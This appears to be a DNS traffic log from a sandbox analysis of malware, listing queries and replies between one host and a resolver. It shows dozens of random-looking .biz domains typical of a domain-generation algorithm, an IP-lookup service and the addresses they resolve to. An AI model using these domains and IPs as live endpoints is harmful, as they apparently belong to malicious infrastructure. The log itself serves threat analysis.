                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:20.692631960 CET53651281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.250890017 CET5956553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:21.259077072 CET53595651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.133065939 CET5021053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.141613007 CET53502101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.596529007 CET4970953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.604594946 CET53497091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.825728893 CET5470453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:22.833648920 CET53547041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.686299086 CET6001553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.693650007 CET53600151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.874140978 CET5499653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:23.881773949 CET53549961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.369508028 CET5018553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.391041040 CET5018553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.552545071 CET53501851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:24.552561998 CET53501851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.403426886 CET6131653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.410799980 CET53613161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.691330910 CET6261053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:25.699590921 CET53626101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.438965082 CET5625753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.447035074 CET53562571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:26.972167015 CET4985853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.000943899 CET4985853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.072971106 CET53498581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.073025942 CET53498581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.958950043 CET5785453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.965867043 CET53578541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.783652067 CET4935853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.792215109 CET53493581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.957281113 CET6237053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.964659929 CET53623701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.717144012 CET5485553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.724728107 CET53548551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.418822050 CET5338453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.426217079 CET53533841.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.124756098 CET6259753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.132795095 CET53625971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.564261913 CET6249653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.571757078 CET53624961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.612049103 CET6432753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.619328022 CET53643271.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
--- | --- | --- | --- | --- | --- | --- | --- | ---
Nov 5, 2024 17:02:50.861166954 CET | 192.168.2.5 | 1.1.1.1 | 0x2544 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:02:51.093909025 CET | 192.168.2.5 | 1.1.1.1 | 0x8222 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:02:51.807470083 CET | 192.168.2.5 | 1.1.1.1 | 0xde78 | Standard query (0) | pywolwnvd.biz | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:02:52.004152060 CET | 192.168.2.5 | 1.1.1.1 | 0x502b | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:02:53.007200956 CET | 192.168.2.5 | 1.1.1.1 | 0xc2ae | Standard query (0) | ssbzmoy.biz | A (IP address) | IN (0x0001) | false
Nov 5, 2024 17:02:53.552527905 CET | 192.168.2.5 | 1.1.1.1 | 0x533 | Standard query (0) | cvgrf.biz | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.485060930 CET192.168.2.51.1.1.10x34edStandard query (0)s82.gocheapweb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.610397100 CET192.168.2.51.1.1.10x1cafStandard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:54.655447006 CET192.168.2.51.1.1.10xdacfStandard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.050637960 CET192.168.2.51.1.1.10xe3d6Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:56.273063898 CET192.168.2.51.1.1.10xe7d8Standard query (0)npukfztj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.087877035 CET192.168.2.51.1.1.10xe635Standard query (0)przvgke.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.447417021 CET192.168.2.51.1.1.10x47a3Standard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:57.456121922 CET192.168.2.51.1.1.10x6ff7Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.729310036 CET192.168.2.51.1.1.10xfb1fStandard query (0)zlenh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.738162994 CET192.168.2.51.1.1.10x4014Standard query (0)knjghuig.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.934417963 CET192.168.2.51.1.1.10x2b18Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.942724943 CET192.168.2.51.1.1.10x287aStandard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.950927973 CET192.168.2.51.1.1.10xe885Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.338768959 CET192.168.2.51.1.1.10x34f3Standard query (0)uhxqin.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.347682953 CET192.168.2.51.1.1.10xb205Standard query (0)anpmnmxo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.355524063 CET192.168.2.51.1.1.10xfca9Standard query (0)lpuegx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.059298992 CET192.168.2.51.1.1.10xf030Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.634147882 CET192.168.2.51.1.1.10xbe90Standard query (0)vjaxhpbji.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:16.147442102 CET192.168.2.51.1.1.10x10f7Standard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.832340002 CET192.168.2.51.1.1.10x4820Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.622926950 CET192.168.2.51.1.1.10x1472Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.105029106 CET192.168.2.51.1.1.10xd9eStandard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.773776054 CET192.168.2.51.1.1.10x8b8fStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.216603041 CET192.168.2.51.1.1.10x8e90Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.289872885 CET192.168.2.51.1.1.10xefaaStandard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.415337086 CET192.168.2.51.1.1.10x716Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.786652088 CET192.168.2.51.1.1.10x6dc6Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:30.698919058 CET192.168.2.51.1.1.10x12a0Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.685425043 CET192.168.2.51.1.1.10x12a0Standard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.651585102 CET192.168.2.51.1.1.10x86fStandard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.959846973 CET192.168.2.51.1.1.10x554aStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.788618088 CET192.168.2.51.1.1.10x9739Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.438602924 CET192.168.2.51.1.1.10x3987Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.842443943 CET192.168.2.51.1.1.10x6b38Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:35.769188881 CET192.168.2.51.1.1.10xdb5fStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:36.528505087 CET192.168.2.51.1.1.10xe55fStandard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.233856916 CET192.168.2.51.1.1.10x1b73Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:37.483865023 CET192.168.2.51.1.1.10xbb5dStandard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.646476030 CET192.168.2.51.1.1.10x37f2Standard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:38.718158960 CET192.168.2.51.1.1.10xbd18Standard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:39.665539026 CET192.168.2.51.1.1.10xcb0aStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:40.135319948 CET192.168.2.51.1.1.10xe2afStandard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.091712952 CET192.168.2.51.1.1.10x7faStandard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:41.364371061 CET192.168.2.51.1.1.10xff65Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.052037954 CET192.168.2.51.1.1.10x5d5fStandard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:42.164278030 CET192.168.2.51.1.1.10xaf38Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:43.055524111 CET192.168.2.51.1.1.10x79c7Standard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.024507046 CET192.168.2.51.1.1.10x30e9Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.532598019 CET192.168.2.51.1.1.10xa6ddStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:44.898556948 CET192.168.2.51.1.1.10x240fStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.234920025 CET192.168.2.51.1.1.10xa075Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:45.792285919 CET192.168.2.51.1.1.10x7d01Standard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.120327950 CET192.168.2.51.1.1.10x66a6Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:46.987751961 CET192.168.2.51.1.1.10xa945Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:47.487055063 CET192.168.2.51.1.1.10xb564Standard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.717144012 CET192.168.2.51.1.1.10x8971Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.418822050 CET192.168.2.51.1.1.10x7ac4Standard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.124756098 CET192.168.2.51.1.1.10xaf1Standard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.564261913 CET192.168.2.51.1.1.10x8fe2Standard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.612049103 CET192.168.2.51.1.1.10xec4dStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.048798084 CET192.168.2.51.1.1.10x6085Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.515948057 CET192.168.2.51.1.1.10x57f2Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.544069052 CET192.168.2.51.1.1.10x57f2Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.479283094 CET192.168.2.51.1.1.10xe81Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:35.931953907 CET192.168.2.51.1.1.10x9d2bStandard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:36.190994978 CET192.168.2.51.1.1.10x5cb0Standard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.315975904 CET192.168.2.51.1.1.10xca55Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:37.401820898 CET192.168.2.51.1.1.10x251dStandard query (0)bghjpy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.064976931 CET192.168.2.51.1.1.10x50f2Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:38.560924053 CET192.168.2.51.1.1.10x9cf0Standard query (0)damcprvgv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:39.076721907 CET192.168.2.51.1.1.10xa6b8Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.123025894 CET192.168.2.51.1.1.10x3b44Standard query (0)ocsvqjg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.127002001 CET192.168.2.51.1.1.10xae00Standard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:40.994302988 CET192.168.2.51.1.1.10x1f08Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.397239923 CET192.168.2.51.1.1.10x2d56Standard query (0)ywffr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.868808031 CET192.168.2.51.1.1.10x5c20Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:41.888591051 CET192.168.2.51.1.1.10x5c20Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.646270990 CET192.168.2.51.1.1.10xc4afStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:42.669039011 CET192.168.2.51.1.1.10xc4afStandard query (0)ecxbwt.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.230670929 CET192.168.2.51.1.1.10x25c9Standard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.912559986 CET192.168.2.51.1.1.10xf3cbStandard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.921050072 CET192.168.2.51.1.1.10xe174Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:43.947117090 CET192.168.2.51.1.1.10x4c71Standard query (0)pectx.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.270217896 CET192.168.2.51.1.1.10x82d6Standard query (0)zyiexezl.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:45.429977894 CET192.168.2.51.1.1.10x905bStandard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.114244938 CET192.168.2.51.1.1.10x9a05Standard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:46.143317938 CET192.168.2.51.1.1.10xf25dStandard query (0)banwyw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.223953962 CET192.168.2.51.1.1.10x9490Standard query (0)muapr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.234467030 CET192.168.2.51.1.1.10x8776Standard query (0)wxgzshna.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:47.570362091 CET192.168.2.51.1.1.10x4c62Standard query (0)xyrgy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:48.309362888 CET192.168.2.51.1.1.10xe021Standard query (0)htwqzczce.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.421881914 CET192.168.2.51.1.1.10x7045Standard query (0)zrlssa.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:49.768788099 CET192.168.2.51.1.1.10x6544Standard query (0)kvbjaur.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.455437899 CET192.168.2.51.1.1.10x647cStandard query (0)jlqltsjvh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:50.623599052 CET192.168.2.51.1.1.10x2a6aStandard query (0)uphca.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:51.308132887 CET192.168.2.51.1.1.10x2200Standard query (0)fjumtfnz.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.950407028 CET1.1.1.1192.168.2.50x287aName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:02:58.958466053 CET1.1.1.1192.168.2.50xe885No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.346707106 CET1.1.1.1192.168.2.50x34f3Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.354979992 CET1.1.1.1192.168.2.50xb205Name error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:00.362942934 CET1.1.1.1192.168.2.50xfca9No error (0)lpuegx.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:08.066595078 CET1.1.1.1192.168.2.50xf030No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:15.641815901 CET1.1.1.1192.168.2.50xbe90No error (0)vjaxhpbji.biz82.112.184.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:16.154601097 CET1.1.1.1192.168.2.50x10f7No error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:17.840024948 CET1.1.1.1192.168.2.50x4820No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:19.630485058 CET1.1.1.1192.168.2.50x1472No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:21.112601995 CET1.1.1.1192.168.2.50xd9eNo error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.882435083 CET1.1.1.1192.168.2.50x8b8fNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:22.882435083 CET1.1.1.1192.168.2.50x8b8fNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:25.224797010 CET1.1.1.1192.168.2.50x8e90No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:26.297899961 CET1.1.1.1192.168.2.50xefaaNo error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:27.425154924 CET1.1.1.1192.168.2.50x716No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:28.793756962 CET1.1.1.1192.168.2.50x6dc6No error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.842134953 CET1.1.1.1192.168.2.50x12a0No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:31.855572939 CET1.1.1.1192.168.2.50x12a0No error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.659569025 CET1.1.1.1192.168.2.50x86fNo error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:32.967454910 CET1.1.1.1192.168.2.50x554aNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:33.796134949 CET1.1.1.1192.168.2.50x9739No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.446882963 CET1.1.1.1192.168.2.50x3987No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:34.850109100 CET1.1.1.1192.168.2.50x6b38No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
